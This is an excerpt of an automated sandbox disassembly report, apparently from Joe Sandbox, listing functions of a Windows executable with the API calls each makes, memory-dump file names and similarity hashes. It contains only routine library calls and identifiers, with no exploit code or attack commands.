                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: GlobalLocklstrlen
                                                                  • String ID:
                                                                  • API String ID: 1144527523-0
                                                                  • Opcode ID: 8169b16f82f0868695eb299ef13228d82f00ca6112b92c9d85447b5b163038f3
                                                                  • Instruction ID: 40d86c0513ae9d415dd9e2a43e2b1b87c3bf4c07422c7a4737d8b13f56130937
                                                                  • Opcode Fuzzy Hash: 8169b16f82f0868695eb299ef13228d82f00ca6112b92c9d85447b5b163038f3
                                                                  • Instruction Fuzzy Hash: 5B41D772A00619EFCB14DFB5D88589EBB78FF04314B50823AE416D7295D7389986CF94
                                                                  Function 00424236 Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0042426A
                                                                  • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 004242CF
                                                                  • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 00424314
                                                                  • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 0042433D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 578cd5156323f8e4839ee2b7b2deaaf76e5d6958570f61373f7fb0b6f96745cb
                                                                  • Instruction ID: 97a3aa0f2093d80d9ab1d2ca581497d8a10018e442b15fa7111c8de2717619ad
                                                                  • Opcode Fuzzy Hash: 578cd5156323f8e4839ee2b7b2deaaf76e5d6958570f61373f7fb0b6f96745cb
                                                                  • Instruction Fuzzy Hash: D2319230701128EBCB25DF56D880EAF7BA9EF81390F90406BF9059B251DA38DD81DBE4
                                                                  Function 00424DE6 Relevance: 6.1, APIs: 4, Instructions: 103stringtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrcpynA.KERNEL32(?,?,00000104), ref: 00424E11
                                                                  • GetFileTime.KERNEL32(?,?,?,?), ref: 00424E33
                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 00424E41
                                                                  • GetFileAttributesA.KERNEL32(?), ref: 00424E6B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesSizeTimelstrcpyn
                                                                  • String ID:
                                                                  • API String ID: 1499663573-0
                                                                  • Opcode ID: f16e3736775d2ddd2b90047da77ffea6f1390e20ccceb3cacd56e450c912fe4a
                                                                  • Instruction ID: 10b0ca20b6ba7935ce24b692c837ef30e80ac275a2c3b5174e3ec32f6528bdd3
                                                                  • Opcode Fuzzy Hash: f16e3736775d2ddd2b90047da77ffea6f1390e20ccceb3cacd56e450c912fe4a
                                                                  • Instruction Fuzzy Hash: F6415B71600615DFD724DF64D880CABBBF8FB493247508A2EE1AAD7690E734F905CB68
                                                                  Function 004097DD Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: FreeString$ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 3349467263-0
                                                                  • Opcode ID: de6ed19b4d79ffda526f10128478d59beb7b2d2a8770046cbd51498ef92bede6
                                                                  • Instruction ID: 9b7dfb74d6b775aa84bb56406a04f63d893804085adcf5f2a56aebc11390cad7
                                                                  • Opcode Fuzzy Hash: de6ed19b4d79ffda526f10128478d59beb7b2d2a8770046cbd51498ef92bede6
                                                                  • Instruction Fuzzy Hash: 4C314872A11219EFCB10EFA5C884ADEBB78BF09710F10812BF519A7281C774A944CBA4
                                                                  Function 0041AE68 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0040E573: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040E58D
                                                                    • Part of subcall function 0040E573: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0040E59E
                                                                    • Part of subcall function 0040E573: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0040E5E4
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AEAB
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,?,00000000,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AEC8
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,?,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?,?,00000018), ref: 0041AF3E
                                                                  • CompareStringW.KERNEL32(?,?,00000190,00000000,?,00000000,?,00000000,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 0041AF54
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$QueryVirtual$CompareInfoStringSystem
                                                                  • String ID:
                                                                  • API String ID: 1997773198-0
                                                                  • Opcode ID: 2f5a63cc3d85905ba8ff51249218b259c6c2d120b32e42e249fa9abd3c0fdf1d
                                                                  • Instruction ID: 5cd4ba0b02cff2006dfa041284cb0cbfb60364f479d6c6401c1f379f8f18e737
                                                                  • Opcode Fuzzy Hash: 2f5a63cc3d85905ba8ff51249218b259c6c2d120b32e42e249fa9abd3c0fdf1d
                                                                  • Instruction Fuzzy Hash: D031BE71801218EBCF219FA2DC49BDE7B76FF08754F24012AF815A61A0D73889A2DB55
                                                                  Function 00412792 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: _strlen$___initmbctable_strcat
                                                                  • String ID:
                                                                  • API String ID: 109824703-0
                                                                  • Opcode ID: b85dc8cf1279c79c59f8bd1564ee49a33527450fdaabd89fe6a56b01cf1f63b2
                                                                  • Instruction ID: c412b2b7f8df5d4b9f6b2b75421172ecb2d2693661a7d437f8156438054eadb6
                                                                  • Opcode Fuzzy Hash: b85dc8cf1279c79c59f8bd1564ee49a33527450fdaabd89fe6a56b01cf1f63b2
                                                                  • Instruction Fuzzy Hash: 631127728081016ED7207F65AD405A77785EB313347240A3FE091932E2DA7C18E6C66C
                                                                  Function 00409432 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CreateH_prologIndirectRect
                                                                  • String ID:
                                                                  • API String ID: 2123978231-0
                                                                  • Opcode ID: 4b0f4901dd638a671841a374c8397060b8bf8be129b0859f566eeb39be9f4921
                                                                  • Instruction ID: 7afd8c56d7a45c3c1b9d016defab70745a838345b1ecd9677a25a07ef7e179f5
                                                                  • Opcode Fuzzy Hash: 4b0f4901dd638a671841a374c8397060b8bf8be129b0859f566eeb39be9f4921
                                                                  • Instruction Fuzzy Hash: BF215C71A00129DBCB11DFA4D98499EB7B8EF08714F5081A6E901BB295C7789E06CBB5
                                                                  Function 0040A5FC Relevance: 6.1, APIs: 4, Instructions: 66COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ArrayDestroyFreeSafeTask
                                                                  • String ID:
                                                                  • API String ID: 3253174383-0
                                                                  • Opcode ID: bb55eb5cadc817f2e48f085d3486655d5a4389d2a61a639251d8b891ef80dd51
                                                                  • Instruction ID: a1dea07ca2ec4367596b7633afa73df90ca84adeb2077ed1b3f452afad63676a
                                                                  • Opcode Fuzzy Hash: bb55eb5cadc817f2e48f085d3486655d5a4389d2a61a639251d8b891ef80dd51
                                                                  • Instruction Fuzzy Hash: 05115E30600305DBDB259F65D848B6677B8AF00741F1D0A3AE8C5AA2E0DB3ADD21CA5E
                                                                  Function 0040957A Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Rect$EqualH_prologIntersect
                                                                  • String ID:
                                                                  • API String ID: 2227276553-0
                                                                  • Opcode ID: cfe4538af5ce4241f94f36a5d2e894a6c0f0bd8464d49d8081b223b50ccd3408
                                                                  • Instruction ID: 913515354d6a92e134cf8808074a3165ff7f6a37c3e08295266c1903fc249c36
                                                                  • Opcode Fuzzy Hash: cfe4538af5ce4241f94f36a5d2e894a6c0f0bd8464d49d8081b223b50ccd3408
                                                                  • Instruction Fuzzy Hash: 2C212C72A00219EFDB11EF95D984DDEBBB8FF08354B10456AF951A3250D7389E058B64
                                                                  Function 0042028C Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,00000000,00000005), ref: 004202B2
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004202BA
                                                                  • LockResource.KERNEL32(00000000), ref: 004202CC
                                                                  • FreeResource.KERNEL32(00000000), ref: 00420316
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindFreeLoadLock
                                                                  • String ID:
                                                                  • API String ID: 1078018258-0
                                                                  • Opcode ID: 0b83120d772461038e2049ec577641a88b61bf73e8f1d9011b83d9a047eaa24e
                                                                  • Instruction ID: 656d2c210f5b5afbe86cf1a99f8a29c5f19edac70fe617a666d0c49f05aa73d5
                                                                  • Opcode Fuzzy Hash: 0b83120d772461038e2049ec577641a88b61bf73e8f1d9011b83d9a047eaa24e
                                                                  • Instruction Fuzzy Hash: 67119D3A601721EFCB24DFA5E948AA7B7B8FB04754F80446AE80253752E778AC05CB74
                                                                  Function 00423181 Relevance: 6.1, APIs: 4, Instructions: 52windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004231AB
                                                                  • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004231CD
                                                                  • GetCapture.USER32 ref: 004231DF
                                                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004231EE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Capture
                                                                  • String ID:
                                                                  • API String ID: 1665607226-0
                                                                  • Opcode ID: 7db1d9e71e75495c4d9147a9e900ecf5cbacbe0365e999608e3c3560ea6febca
                                                                  • Instruction ID: f54eaa0953af14796ca2798ad8be5b391c5598d7a46c12b9b30925c7b8ab6a99
                                                                  • Opcode Fuzzy Hash: 7db1d9e71e75495c4d9147a9e900ecf5cbacbe0365e999608e3c3560ea6febca
                                                                  • Instruction Fuzzy Hash: 1E016D713403197FFA302B15ACC9FBB76ADDF88789F910439F241AB2D2CA959C059A64
                                                                  Function 004249C5 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 004249F9
                                                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 004249FF
                                                                  • DuplicateHandle.KERNEL32(00000000), ref: 00424A02
                                                                  • GetLastError.KERNEL32(?), ref: 00424A1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcess$DuplicateErrorHandleLast
                                                                  • String ID:
                                                                  • API String ID: 3907606552-0
                                                                  • Opcode ID: e60f49e3c131c40013d4e8fd54a17e3d401a2657e5a6576110243408ecd1152f
                                                                  • Instruction ID: 8ac3f6cd50cf8df22ad13eb24bf5b481f7bec5be52e842199ecbcbeb8f3ca53e
                                                                  • Opcode Fuzzy Hash: e60f49e3c131c40013d4e8fd54a17e3d401a2657e5a6576110243408ecd1152f
                                                                  • Instruction Fuzzy Hash: 1C012471700210BBDB20AFB6EC49F1B7BADEF84360F608026F915CB281DA74DC018764
                                                                  Function 0042C03B Relevance: 6.0, APIs: 4, Instructions: 49networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • htonl.WS2_32(00000000), ref: 0042C075
                                                                  • htons.WS2_32(?), ref: 0042C081
                                                                    • Part of subcall function 0040422C: bind.WS2_32(?,00000002,00000002), ref: 00404237
                                                                  • inet_addr.WS2_32(?), ref: 0042C0B3
                                                                  • WSASetLastError.WS2_32(00002726), ref: 0042C0C3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastbindhtonlhtonsinet_addr
                                                                  • String ID:
                                                                  • API String ID: 3045141626-0
                                                                  • Opcode ID: fdd929dac27bfb8b269abb1e6dbd06ae9421f0aed8c90508c6ae5c3d1d7e3271
                                                                  • Instruction ID: bb8df0c29fff26a21c7ebcb5d6223e386f4c65aafe457ce3011b1e801e2c3432
                                                                  • Opcode Fuzzy Hash: fdd929dac27bfb8b269abb1e6dbd06ae9421f0aed8c90508c6ae5c3d1d7e3271
                                                                  • Instruction Fuzzy Hash: D2018831A00118ABCB10EBE5E84599FBBB8AF44354F500526F505E7291DB785A45C7DA
                                                                  Function 00422618 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTopWindow.USER32(?), ref: 00422626
                                                                  • GetTopWindow.USER32(00000000), ref: 00422665
                                                                  • GetWindow.USER32(00000000,00000002), ref: 00422683
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Window
                                                                  • String ID:
                                                                  • API String ID: 2353593579-0
                                                                  • Opcode ID: 81da272bab6fcc9ea7e7a7430d34d7fcffd1c11d78819ae3fe2fecd1ce21925b
                                                                  • Instruction ID: cb0a53dda468c9b6b58841506fecf0a12188666d2209ed4bb47fc30449578cc2
                                                                  • Opcode Fuzzy Hash: 81da272bab6fcc9ea7e7a7430d34d7fcffd1c11d78819ae3fe2fecd1ce21925b
                                                                  • Instruction Fuzzy Hash: FA01043320152ABBCF125F91AE05E9F3B26AF54361F854116FE0061160D77AD932EBAE
                                                                  Function 0042206C Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,?), ref: 00422077
                                                                  • GetTopWindow.USER32(00000000), ref: 0042208A
                                                                    • Part of subcall function 0042206C: GetWindow.USER32(00000000,00000002), ref: 004220D1
                                                                  • GetTopWindow.USER32(?), ref: 004220BA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item
                                                                  • String ID:
                                                                  • API String ID: 369458955-0
                                                                  • Opcode ID: 6c6900eeac992edc6914a5118e1541f0b22b5380ff1e1b3e7d3a0b70f71fff3c
                                                                  • Instruction ID: 611b05ef37a8cdda27b70757f5ae3b19c9143c7451e53f26c9eb106d08c62b60
                                                                  • Opcode Fuzzy Hash: 6c6900eeac992edc6914a5118e1541f0b22b5380ff1e1b3e7d3a0b70f71fff3c
                                                                  • Instruction Fuzzy Hash: 26018432301539B7DB322F52AE04FAF36559F157A0F804026FF00A1220D7B9D951D69D
                                                                  Function 004275D6 Relevance: 6.0, APIs: 4, Instructions: 48registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0042760A
                                                                  • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00427613
                                                                  • wsprintfA.USER32 ref: 0042762F
                                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00427645
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ClosePrivateProfileStringValueWritewsprintf
                                                                  • String ID:
                                                                  • API String ID: 1902064621-0
                                                                  • Opcode ID: dbcabcc69f35e4ea2064bd688e25f9756b693440038725029bf2d78983c0515e
                                                                  • Instruction ID: 249eee3b46158d6d5fcb97f90f683b9770f48eaba065b46f6e1ac24a512eab86
                                                                  • Opcode Fuzzy Hash: dbcabcc69f35e4ea2064bd688e25f9756b693440038725029bf2d78983c0515e
                                                                  • Instruction Fuzzy Hash: 5B015E32600629FBCB21AFA5DD05E9F3BA9BF08714F404436FA01A6150DB75DA129B98
                                                                  Function 0042A065 Relevance: 6.0, APIs: 4, Instructions: 45memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SysStringLen.OLEAUT32(?), ref: 0042A079
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,0042B1A4,00000000), ref: 0042A08F
                                                                  • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 0042A097
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,?,0042B1A4,00000000), ref: 0042A0AC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
